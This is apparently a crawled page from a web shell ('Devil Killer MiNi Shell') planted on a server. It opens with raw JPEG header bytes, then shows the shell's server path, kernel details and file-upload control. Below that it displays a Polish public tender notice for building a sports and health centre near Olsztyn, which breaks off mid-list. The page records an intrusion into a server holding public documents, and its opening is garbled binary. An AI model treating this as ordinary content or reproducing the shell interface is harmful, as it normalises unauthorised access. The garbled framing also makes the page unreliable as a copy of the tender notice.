JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220401/0010637002-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Prozdrowotne i prosportowe rozwiązania architektoniczne w walce z COVID-19- budowa Powiatowego Centrum Sportu i Zdrowia przy Zespole Szkół w Olsztynku- I etap </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Olsztyński</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510742669</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Bema 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">10-516</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiat-olsztynski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.powiat-olsztynski.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Prozdrowotne i prosportowe rozwiązania architektoniczne w walce z COVID-19- budowa Powiatowego Centrum Sportu i Zdrowia przy Zespole Szkół w Olsztynku- I etap </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-12dea79e-ae6e-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00106370</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00019115/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Prozdrowotne i prosportowe rozwiązania architektoniczne w walce z COVID-19- zaprojektowanie i wybudowanie Powiatowego Centrum Sportu i Zdrowia przy Zespole Szkół w Olsztynku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiat-olsztynski.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą odbywa się za pośrednictwem Platformy znajdującej się pod adresem https://powiat-olsztynski.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą odbywa się za pośrednictwem Platformy znajdującej się pod adresem https://powiat-olsztynski.ezamawiajacy.pl<br/>Link do Platformy znajduje się pod adresem: https://bip.powiat-olsztynski.pl/5037/platforma-zakupowa.html<br/>Jakiekolwiek dokumenty, oświadczenia i informacje przekazane w inny sposób niż za pośrednictwem Platformy zostaną przez Zamawiającego zignorowane.<br/>2.	Ofertę oraz oświadczenie, o którym mowa w Rozdziale IX ust. 1-3 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>3.	Za datę przekazania oferty, oświadczeń, wniosków, zawiadomień, informacji, dokumentów przyjmuje się datę ich wysłania na Platformie.<br/>4.	Ogólne zasady korzystania z Platformy:<br/>1)	zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Powiatu Olsztyńskiego: https://powiat-olsztynski.ezamawiajacy.pl lub https://oneplace.marketplanet.pl<br/>2)	rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci elektronicznej.<br/>5.	Zamawiający określa dopuszczalny format kwalifikowanego podpisu elektronicznego, jako:<br/>1)	dokumenty w formacie PDF zaleca się podpisywać formatem PAdES,<br/>2)	dopuszcza się podpisanie dokumentów w formacie innym niż PDF wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu oddzielny plik z podpisem.<br/>6.	Zamawiający wskazuje informacje dotyczące systemu operacyjnego:<br/>1)	komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta<br/>2)	aktualne wersje przeglądarek wspierane przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge,<br/>3)	podłączenie do Internetu: min. 512 Kb/s na komputer (zalecane szerokopasmowe łącze internetowe).<br/>7.	Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB: <br/>1)	Zamawiający zaleca stosowanie następujących formatów danych wskazanych w Rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ramach Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych: .pdf,.doc, .docx, .xls, .jpg, .jpeg, , .zip, .7Z,. XML, .PAdES.<br/>2)	Zamawiający dopuszcza stosowanie pozostałych formatów danych wskazanych w Krajowych Ramach Interoperacyjności w szczególności: .txt, .rtf, .xps, .ods, .odp, .ppt, .xlsx, .pptx, .csv, .tif, .geotiff, .svg, .tar, .gz, .XAdES, .odt, .png<br/>3)	Zamawiający nie obsłuży plików, które nie znajdują się na liście plików wskazanych w Krajowych Ramach Interoperacyjności.<br/>8.	Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj: <br/>1)	plik załączony przez Wykonawcę na Platformie i zapisany, widoczny jest w Systemie jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert,<br/>2)	oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IRL-III.272.3.2022.EM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych w ramach inwestycji pn.: „Prozdrowotne i prosportowe rozwiązania architektoniczne w walce z COVID-19 - budowa Powiatowego Centrum Sportu i Zdrowia przy Zespole Szkół w Olsztynku- I etap”.<br/>2. Zakres przedmiotu zamówienia obejmuje realizację następujących zadań:<br/>1)	Zadanie 1: opracowanie wielobranżowej dokumentacji projektowej budowy wraz z budową lub przebudową istniejącej infrastruktury technicznej z dowiązaniem do istniejącego układu drogowego, z uzyskaniem kompletu uzgodnień, opinii, odstępstw w rozumieniu Prawa budowlanego i wymaganych prawem decyzji niezbędnych do realizacji inwestycji, dokumentacji projektowej wykonawczej wszystkich branż, ofertowego kosztorysu budowlanego oraz wykonanie prac geodezyjnych; uzyskanie ostatecznej decyzji o pozwoleniu na budowę oraz sprawowanie nadzoru autorskiego, w zakresie o którym mowa w art. 20 ust. 1 pkt 4 ustawy Prawo budowlane; <br/>2)	Zadanie 2: wykonanie robót budowlanych w zakresie wynikającym z dokumentacji opisanej w pkt 1) oraz uzyskanie od właściwego organu nadzoru budowlanego decyzji o pozwoleniu na użytkowanie lub dokonanie zawiadomienia o zakończeniu budowy do właściwego organu nadzoru budowlanego zgodnie ze stanem prawnym w tym dniu i przedłożenie Zamawiającemu uzyskanych pozwoleń i dokumentów potwierdzających skuteczność złożenia zawiadomień. Wykonawca we własnym zakresie ustala jakie części przedmiotu umowy i w jakim terminie wymagają uzyskania takich pozwoleń i złożenia zawiadomień. Zamawiający udzieli Wykonawcy stosownego pełnomocnictwa w tym zakresie.<br/>3.	W zakresie zadania 1, o którym mowa w ust. 2 pkt 1 Wykonawca:<br/>1)	sporządzi wielobranżowy projekt budowlany na aktualnej mapie do celów projektowych z kompletem uzgodnień, pozytywnych opinii, wymaganych pozwoleń, decyzji, zgłoszeń i odstępstw w rozumieniu ustawy Prawo budowlane (Dz.U. 2021 poz. 2351 z późn. zm.), opracowanych zgodnie z przepisami Rozporządzenia Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. 2021 poz. 2454), dokumentację badań podłoża gruntowego oraz projekt geotechniczny, zatwierdzoną dokumentację geologiczno-inżynierską w zakresie posadowienia budynku hali oraz potrzeb realizacji pionowej instalacji pompy ciepła - w 2 egzemplarzach w wersji papierowej oraz w formie elektronicznej w formacie pdf oraz w formacie edytowalnym na nośniku zewnętrznym,<br/>2)	sporządzi uzgodnione projekty wykonawcze i techniczne (dla wszystkich branż) niezbędne dla realizacji robót budowlanych wraz z projektem zieleni i nasadzeń, projektami docelowej i tymczasowej organizacji ruchu oraz projektem odwodnienia i umocnienia wykopów (w przypadku konieczności wykonania), specyfikacjami technicznymi wykonania i odbioru robót budowlanych - w 2 egzemplarzach w wersji papierowej oraz w formie elektronicznej w formacie pdf oraz w formacie edytowalnym na nośniku zewnętrznym,<br/>3)	sporządzi kosztorys ofertowy odpowiadający cenie ofertowej zadeklarowanej w postępowaniu o udzieleniu zamówienia publicznego w oparciu o Rozporządzenie Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym ( Dz.U. 2021 poz. 2458) - w 2 egzemplarzach w formie papierowej oraz w formie elektronicznej w formacie pdf oraz w pliku wykonawczym w rozszerzeniach (*.kst) lub (*.zuz) lub (*.ath) lub (*.gtm) lub (*.pla) lub (*.ftx) na nośniku zewnętrznym,<br/>4)	sporządzi specyfikację techniczną wykonania i odbioru robót budowlanych – w 2 egzemplarzach w formie papierowej oraz w formie elektronicznej w formacie pdf oraz w formacie edytowalnym na nośniku zewnętrznym,<br/>5)	sporządzi informację dotyczącą bezpieczeństwa i ochrony zdrowia (BIOZ) – w 2 egzemplarzach w formie papierowej oraz w formie elektronicznej w formacie pdf oraz w formacie edytowalnym na nośniku zewnętrznym,<br/>6)	będzie pełnił nadzór autorski w trakcie realizacji inwestycji w okresie od dnia przekazania przez Zamawiającego terenu budowy do dnia podpisania protokołu odbioru końcowego przedmiotu umowy przez Nadzór Inwestorski (zwany dalej Nadzorem) i Zamawiającego.<br/>4.	W zakresie Zadania 2, o którym mowa w ust. 2 pkt. 2 Wykonawca:<br/>1)	wykona roboty budowlane w oparciu o sporządzoną dokumentację projektową opisaną w ust. 3,<br/>2)	uzyska decyzję o pozwoleniu na użytkowanie lub dokona zawiadomienia o zakończeniu budowy do właściwego organu nadzoru budowlanego.<br/>5.	Szczegółowy opis przedmiotu zamówienia stanowi Program funkcjonalno-użytkowy wraz z koncepcją architektoniczną – załącznik nr 1 do SWZ, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45212225-9 - Roboty budowlane związane z halami sportowymi</p> <p class="mb-0">45223200-8 - Roboty konstrukcyjne</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45262210-6 - Fundamentowanie</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">48 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający kierować się będzie następującymi kryteriami: <br/>1) cena - 60 % waga kryterium,<br/>2) okres udzielonej gwarancji na wykonane roboty budowlane– 31 % waga kryterium<br/>3) dodatkowe doświadczenie kluczowego personelu Wykonawcy - 9% waga kryterium<br/><br/>Gdzie 1% = 1 pkt <br/><br/>2. Maksymalna liczba punktów w kryterium równa jest określonej wadze kryterium w %. Ocena łączna stanowi sumę punktów uzyskanych w ramach poszczególnych kryteriów. Uzyskana liczba punktów w ramach kryterium zaokrąglona będzie do drugiego miejsca po przecinku. <br/>2. Każdej ofercie zostanie przypisana ocena stanowiąca łączną liczbę punktów w wymienionych kryteriach. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku (zasada zaokrąglenia – poniżej 5 końcówka zostanie pominięta, powyżej i równe 5 zostanie zaokrąglona w górę).<br/>3. Jako najkorzystniejsza zostanie wybrana oferta, która uzyska najwyższą łączną liczbę punktów spośród ofert nie podlegających odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">31</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dodatkowe doświadczenie kluczowego personelu Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">9</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej.<br/> Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że: <br/>1)	w okresie ostatnich 3 lat, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej jedną usługę polegającą na opracowaniu kompletnej dokumentacji projektowej w zakresie budowy, rozbudowy lub przebudowy budynku użyteczności publicznej o powierzchni użytkowej budynku powstałej w wyniku budowy/rozbudowy/przebudowy nie mniejszej niż 2000m2 wraz z uzyskaniem decyzji administracyjnej zezwalającej na realizację robót budowlanych wynikających z ww. dokumentacji,<br/>2)	w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał należycie co najmniej jedną robotę budowlaną polegającą na budowie, rozbudowie lub przebudowie budynku użyteczności publicznej o powierzchni użytkowej budynku powstałej w wyniku budowy / rozbudowy / przebudowy nie mniejszej niż 2000m2.<br/><br/>Przez budynek użyteczności publicznej Zamawiający rozumie budynek, o którym mowa w §3 pkt 6 rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (tj. Dz. U. 2019 poz. 1065).<br/><br/>3)	dysponuje następującymi osobami, które będą skierowane do realizacji zamówienia posiadającymi uprawnienia i doświadczenie niezbędne do wykonania zamówienia:<br/>W zakresie projektowania:<br/>a)	1 osoba posiadająca uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej, która posiada doświadczenie zawodowe polegające na autorstwie opracowania co najmniej jednej dokumentacji projektowej (co najmniej projektu budowlanego) dotyczącej budowy lub rozbudowy lub przebudowy budynku użyteczności publicznej o powierzchni użytkowej powstałej w wyniku budowy/rozbudowy/przebudowy budynku nie mniejszej niż 2000 m2, dla której wydano decyzję administracyjną zezwalającą na realizację robót budowlanych wynikających z ww. dokumentacji,<br/>b)	1 osoba posiadająca uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej, która posiada doświadczenie zawodowe polegające na autorstwie opracowania co najmniej jednej dokumentacji projektowej (co najmniej projektu budowlanego) dotyczącej budowy lub rozbudowy lub przebudowy budynku użyteczności publicznej o powierzchni użytkowej powstałej w wyniku budowy/rozbudowy/przebudowy budynku nie mniejszej niż 2000 m2, dla której wydano decyzję administracyjną zezwalającą na realizację robót budowlanych wynikających z ww. dokumentacji,<br/>c)	1 osoba posiadającą uprawnienia budowlane do projektowania w specjalności inżynieryjnej drogowej,<br/>d)	1 osoba posiadająca uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,<br/>e)	1 osoba posiadająca uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, <br/>f)	1 osoba posiadająca uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych,<br/>g)	1 osoba posiadająca uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń gazowych,<br/>h)	1 osoba posiadająca uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych,<br/>i)	1 osoba posiadająca uprawnienia budowlane do 